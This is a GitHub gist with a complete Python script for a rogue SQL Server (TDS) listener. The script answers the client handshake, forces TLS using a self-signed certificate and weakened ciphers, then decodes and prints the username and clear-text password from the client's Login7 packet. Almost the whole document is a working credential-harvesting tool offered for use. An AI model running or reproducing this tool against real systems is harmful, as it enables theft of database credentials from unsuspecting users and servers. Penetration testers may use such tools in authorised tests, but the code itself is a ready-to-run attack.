Skip to content

Instantly share code, notes, and snippets.

@jimmy-ly00
Created February 16, 2026 23:01
Show Gist options
  • Select an option

  • Save jimmy-ly00/c1d757b787fae5b6f5e74cc621b72c0d to your computer and use it in GitHub Desktop.

Select an option

Save jimmy-ly00/c1d757b787fae5b6f5e74cc621b72c0d to your computer and use it in GitHub Desktop.
Rogue TDS SQL Server
"""
Rogue TDS/SQL Server - Captures SQL credentials from Login7 packets.
Implements the TDS pre-login handshake and TLS negotiation so the client
proceeds to send Login7 with credentials.
Requires: pip install cryptography
"""
import socket
import struct
import ssl
import tempfile
import os
import sys
# TDS packet-header type bytes used by this script.
# Pre-Login packets; also the type used to wrap TLS handshake records.
TDS_PRELOGIN = 0x12
# Login7 packet, whose payload is parsed for the client's login fields.
TDS_LOGIN7 = 0x10
# Certificate Generation
def generate_cert():
    """Create (or reuse) a self-signed certificate for the TLS handshake.

    The PEM certificate and private key live in the system temp directory
    as ``rogue_sql.crt`` and ``rogue_sql.key``.  When both files already
    exist they are reused untouched; otherwise a new 2048-bit RSA key and
    a certificate valid for 365 days are generated.

    Returns:
        tuple[str, str]: ``(cert_path, key_path)``.

    Raises:
        SystemExit: if the ``cryptography`` package is not installed.
    """
    try:
        from cryptography import x509
        from cryptography.x509.oid import NameOID
        from cryptography.hazmat.primitives import hashes, serialization
        from cryptography.hazmat.primitives.asymmetric import rsa
        from datetime import datetime, timedelta, timezone
    except ImportError:
        print("[!] Install cryptography: pip install cryptography")
        sys.exit(1)

    tmp_dir = tempfile.gettempdir()
    cert_path = os.path.join(tmp_dir, "rogue_sql.crt")
    key_path = os.path.join(tmp_dir, "rogue_sql.key")
    if os.path.exists(cert_path) and os.path.exists(key_path):
        return cert_path, key_path

    key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    # Self-signed: subject and issuer are the same name.
    subject = issuer = x509.Name([
        x509.NameAttribute(NameOID.COMMON_NAME, "SQLServer"),
    ])
    # Timezone-aware "now"; datetime.utcnow() is deprecated since Python 3.12.
    now = datetime.now(timezone.utc)
    cert = (
        x509.CertificateBuilder()
        .subject_name(subject)
        .issuer_name(issuer)
        .public_key(key.public_key())
        .serial_number(x509.random_serial_number())
        .not_valid_before(now)
        .not_valid_after(now + timedelta(days=365))
        .sign(key, hashes.SHA256())
    )

    with open(cert_path, "wb") as f:
        f.write(cert.public_bytes(serialization.Encoding.PEM))

    # The temp directory is usually shared between users, so request
    # owner-only permissions for the private key instead of relying on the
    # umask.  The mode only takes effect when the file is newly created.
    flags = os.O_WRONLY | os.O_CREAT | os.O_TRUNC | getattr(os, "O_BINARY", 0)
    fd = os.open(key_path, flags, 0o600)
    with os.fdopen(fd, "wb") as f:
        f.write(key.private_bytes(
            serialization.Encoding.PEM,
            serialization.PrivateFormat.TraditionalOpenSSL,
            serialization.NoEncryption(),
        ))

    print(f"[*] Generated cert: {cert_path}")
    print(f"[*] Generated key: {key_path}")
    return cert_path, key_path
# low-level helpers
def recv_exact(sock, n):
    """Receive exactly ``n`` bytes from ``sock``.

    Args:
        sock: Object with a ``recv(size)`` method returning bytes.
        n: Number of bytes wanted.

    Returns:
        bytes | None: exactly ``n`` bytes, ``b""`` when ``n <= 0``, or
        ``None`` if the peer closed the connection before ``n`` bytes
        arrived.
    """
    if n <= 0:
        return b""
    # bytearray grows in place; repeated ``bytes +=`` re-copies the buffer
    # on every chunk.
    buf = bytearray()
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            return None
        buf += chunk
    return bytes(buf)
def read_tds_packet(sock):
    """Read one TDS packet from a plain (non-TLS) socket.

    The 8-byte header holds the packet type (byte 0), the status (byte 1)
    and the big-endian total length including the header (bytes 2-3).

    Args:
        sock: Connected socket to read from.

    Returns:
        tuple: ``(pkt_type, status, payload)``.  ``(None, None, None)`` is
        returned when the peer disconnects, when the declared length is
        smaller than the header itself, or when the payload is truncated,
        so a caller never sees a valid type paired with a missing payload.
    """
    hdr = recv_exact(sock, 8)
    if not hdr:
        return None, None, None
    pkt_type, status, length = struct.unpack_from(">BBH", hdr)
    if length < 8:
        # Malformed header: the length field counts the 8 header bytes.
        return None, None, None
    payload = recv_exact(sock, length - 8)
    if payload is None:
        # Connection dropped in the middle of the packet.
        return None, None, None
    return pkt_type, status, payload
def build_tds_packet(pkt_type, payload, status=0x01, pkt_id=1):
    """Prefix ``payload`` with an 8-byte TDS packet header.

    Header fields, all big-endian: type, status, total length (header
    included), a zero 16-bit field, packet id and a zero trailing byte.

    Returns:
        bytes: header followed by ``payload``.
    """
    total_len = 8 + len(payload)
    header = struct.pack(">BBHHBB", pkt_type, status, total_len, 0, pkt_id, 0)
    return b"".join((header, payload))
# Pre-Login
def build_prelogin_response():
    """Assemble the payload of the server's TDS Pre-Login response.

    Layout: one 5-byte option header per option (token id, big-endian
    offset of its data, big-endian data length), a 0xFF terminator, then
    the option data in the same order.  ENCRYPTION is set to 0x01
    (ENCRYPT_ON) so the client goes on to a TLS handshake and sends
    Login7 inside TLS.

    Returns:
        bytes: the 39-byte pre-login response payload.
    """
    options = (
        (0x00, b"\x0f\x00\x07\xd0\x00\x00"),  # version: 15.0.2000 (SQL 2019)
        (0x01, b"\x01"),                      # encryption: ENCRYPT_ON
        (0x02, b"\x00"),                      # instopt
        (0x03, b"\x00\x00\x00\x00"),          # thread id
        (0x04, b"\x00"),                      # MARS
    )
    # Data starts right after the option headers and the terminator byte.
    cursor = 5 * len(options) + 1
    headers = []
    for opt_id, blob in options:
        headers.append(struct.pack(">BHH", opt_id, cursor, len(blob)))
        cursor += len(blob)
    data_section = b"".join(blob for _, blob in options)
    return b"".join(headers) + b"\xff" + data_section
# TLS handshake (TDS-wrapped)
def tds_tls_handshake(conn, ssl_ctx):
    """Run the server side of a TLS handshake tunnelled through TDS.

    During the handshake every TLS record travels inside a TDS PRELOGIN
    (0x12) packet.  The TLS engine works on in-memory BIOs: bytes it
    produces are wrapped and sent on ``conn``, and payloads of packets
    read from ``conn`` are fed back in.

    Args:
        conn: Connected client socket.
        ssl_ctx: Server-side ``ssl.SSLContext`` with a certificate loaded.

    Returns:
        tuple: ``(tls_object, incoming_bio, outgoing_bio)``.

    Raises:
        ConnectionError: if no packet payload can be read from the client
            before the handshake completes.
    """
    incoming = ssl.MemoryBIO()
    outgoing = ssl.MemoryBIO()
    tls = ssl_ctx.wrap_bio(incoming, outgoing, server_side=True)

    def flush_pending():
        # Ship whatever the TLS engine has queued, wrapped in a TDS packet.
        pending = outgoing.read()
        if pending:
            conn.sendall(build_tds_packet(TDS_PRELOGIN, pending))

    while True:
        try:
            tls.do_handshake()
        except ssl.SSLWantReadError:
            finished = False
        else:
            finished = True

        flush_pending()
        if finished:
            return tls, incoming, outgoing

        # The engine needs more input: take the next TDS packet from the
        # client and feed its payload into the incoming BIO.
        _pkt_type, _status, record = read_tds_packet(conn)
        if record is None:
            raise ConnectionError("Client disconnected during TLS handshake")
        incoming.write(record)
# Reading TDS-over-TLS
def tls_recv(conn, tls_obj, in_bio, n):
    """Read up to ``n`` decrypted bytes from the TLS stream.

    Whenever the TLS object reports that it needs more input, raw bytes
    are read from ``conn`` and written into ``in_bio``.

    Args:
        conn: Socket carrying the raw TLS records.
        tls_obj: TLS object whose ``read(size)`` yields decrypted bytes.
        in_bio: Incoming BIO that feeds ``tls_obj``.
        n: Number of decrypted bytes wanted.

    Returns:
        bytes: exactly ``n`` bytes, or fewer if the stream ended first
        (socket EOF, clean TLS close, or an empty read).
    """
    buf = bytearray()
    while len(buf) < n:
        try:
            chunk = tls_obj.read(n - len(buf))
        except ssl.SSLWantReadError:
            raw = conn.recv(16384)
            if not raw:
                break  # peer closed the TCP connection
            in_bio.write(raw)
            continue
        except ssl.SSLZeroReturnError:
            break  # peer closed the TLS session cleanly
        if not chunk:
            # An empty read means end of stream; looping again would spin
            # forever without making progress.
            break
        buf += chunk
    return bytes(buf)
def read_tds_over_tls(conn, tls_obj, in_bio):
    """Read a single TDS packet from the decrypted TLS stream.

    Returns:
        tuple: ``(pkt_type, status, payload)``, or ``(None, None, None)``
        when a full 8-byte header could not be read.  The payload is
        whatever ``tls_recv`` delivered for the declared length, which may
        be shorter than declared if the stream ended early.
    """
    header = tls_recv(conn, tls_obj, in_bio, 8)
    if not header or len(header) < 8:
        return None, None, None
    # Byte 0: type, byte 1: status, bytes 2-3: big-endian total length.
    pkt_type, status, total_len = struct.unpack_from(">BBH", header)
    body = tls_recv(conn, tls_obj, in_bio, total_len - 8)
    return pkt_type, status, body
# Login7 parsing
def decode_password(raw_bytes):
    """Recover the clear-text password from its Login7 obfuscated form.

    The obfuscation swaps the two nibbles of each byte and then XORs it
    with 0xA5, so decoding XORs with 0xA5 first and then swaps the
    nibbles back.  The resulting bytes are decoded as UTF-16-LE, with
    undecodable sequences replaced.

    Returns:
        str: the decoded password.
    """
    unmasked = (octet ^ 0xA5 for octet in raw_bytes)
    plain = bytes(((v << 4) & 0xF0) | (v >> 4) for v in unmasked)
    return plain.decode("utf-16-le", errors="replace")
def parse_login7(data):
    """Pull the variable-length text fields out of a Login7 payload.

    Each field is described by a little-endian (byte offset, character
    count) pair at a fixed position in the payload; the text itself is
    UTF-16-LE, and the password is additionally run through
    ``decode_password``.

    Returns:
        dict: field name -> decoded string.  Empty when the payload is
        shorter than 94 bytes.  Fields with a zero character count map to
        ``""``; fields whose data would run past the end of the payload
        are omitted.
    """
    if len(data) < 94:
        return {}

    # (field name, position of its offset/length pair).  The pair at
    # position 56 is deliberately not extracted.
    slots = (
        ("HostName", 36),
        ("UserName", 40),
        ("Password", 44),
        ("AppName", 48),
        ("ServerName", 52),
        ("InterfaceName", 60),
        ("Language", 64),
        ("Database", 68),
    )
    total = len(data)
    parsed = {}
    for label, pos in slots:
        start, n_chars = struct.unpack_from("<HH", data, pos)
        if n_chars == 0:
            parsed[label] = ""
            continue
        stop = start + 2 * n_chars  # two bytes per UTF-16 code unit
        if stop > total:
            continue
        blob = data[start:stop]
        if label == "Password":
            parsed[label] = decode_password(blob)
        else:
            parsed[label] = blob.decode("utf-16-le", errors="replace")
    return parsed
# Main server loop
def _report_client_encryption(payload):
    """Print the ENCRYPTION option (token 0x01) found in a Pre-Login payload.

    The option table is a run of 5-byte entries (token, big-endian offset,
    big-endian length) ended by 0xFF.  Parsing stops quietly at a
    truncated entry instead of raising.
    """
    enc_names = {0: "OFF", 1: "ON", 2: "NOT_SUP", 3: "REQ"}
    pos = 0
    while pos + 5 <= len(payload) and payload[pos] != 0xFF:
        token, off, ln = struct.unpack_from(">BHH", payload, pos)
        if token == 0x01 and ln == 1 and off < len(payload):
            enc_val = payload[off]
            print(f"[*] Client encryption: ENCRYPT_{enc_names.get(enc_val, '?')} (0x{enc_val:02x})")
        pos += 5


def _handle_client(conn, ssl_ctx):
    """Run the Pre-Login / TLS / Login7 exchange with one connected client."""
    # Step 1: Pre-Login
    pkt_type, _, payload = read_tds_packet(conn)
    if pkt_type is None or payload is None:
        # Formatting None with ':02x' would raise, so report it explicitly.
        print("[-] Client disconnected before sending a complete Pre-Login")
        return
    if pkt_type != TDS_PRELOGIN:
        print(f"[-] Expected Pre-Login (0x12), got 0x{pkt_type:02x}")
        return
    print(f"[*] Received Pre-Login ({len(payload)} bytes)")
    _report_client_encryption(payload)

    # Step 2: Pre-Login Response
    conn.sendall(build_tds_packet(TDS_PRELOGIN, build_prelogin_response()))
    print("[*] Sent Pre-Login response (ENCRYPT_ON)")

    # Step 3: TLS Handshake
    print("[*] Starting TLS handshake …")
    tls, in_bio, _out_bio = tds_tls_handshake(conn, ssl_ctx)
    print(f"[*] TLS handshake complete ({tls.version()})")

    # Step 4: Read Login7 inside TLS
    pkt_type, _, l7_data = read_tds_over_tls(conn, tls, in_bio)
    if pkt_type is None:
        print("[-] No data after TLS handshake")
        return
    print(f"[*] Received TDS packet type 0x{pkt_type:02x} ({len(l7_data)} bytes)")
    if pkt_type == TDS_LOGIN7:
        creds = parse_login7(l7_data)
        print()
        print(f"{'*' * 60}")
        print(" CAPTURED CREDENTIALS")
        print(f"{'*' * 60}")
        for k, v in creds.items():
            print(f" {k:16s}: {v}")
        print(f"{'*' * 60}")
        print()
    else:
        print(f"[-] Expected Login7 (0x10), got 0x{pkt_type:02x}")
        print(f" Hex preview: {l7_data[:80].hex()}")


def main():
    """Listen on 0.0.0.0:1433 and handle clients one at a time.

    Each connection gets a socket timeout so a silent client cannot block
    the single-threaded accept loop indefinitely.  Errors while handling
    one client are reported and the loop moves on to the next.  Ctrl+C
    stops the server and the listening socket is closed on exit.
    """
    host = "0.0.0.0"
    port = 1433
    client_timeout = 30.0  # seconds allowed per blocking socket operation

    cert_path, key_path = generate_cert()
    ssl_ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ssl_ctx.load_cert_chain(cert_path, key_path)
    try:
        ssl_ctx.minimum_version = ssl.TLSVersion.TLSv1
    except (AttributeError, ValueError):
        pass  # Older Python or restricted build
    try:
        ssl_ctx.set_ciphers("DEFAULT:@SECLEVEL=0")
    except ssl.SSLError:
        ssl_ctx.set_ciphers("DEFAULT")

    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((host, port))
        srv.listen(5)
        print(f"[*] Rogue SQL Server listening on {host}:{port}")
        print("[*] Waiting for connections …\n")
        count = 0
        try:
            while True:
                conn, addr = srv.accept()
                count += 1
                print(f"{'=' * 60}")
                print(f"[+] Connection #{count} from {addr[0]}:{addr[1]}")
                print(f"{'=' * 60}")
                try:
                    conn.settimeout(client_timeout)
                    _handle_client(conn, ssl_ctx)
                except socket.timeout:
                    print(f"[-] Client timed out after {client_timeout:.0f}s")
                except Exception as ex:
                    # Top-level boundary: report and keep serving others.
                    print(f"[-] Error: {ex}")
                    import traceback
                    traceback.print_exc()
                finally:
                    try:
                        conn.close()
                    except OSError:
                        pass
                print()
        except KeyboardInterrupt:
            print("\n[*] Shutting down")


if __name__ == "__main__":
    main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment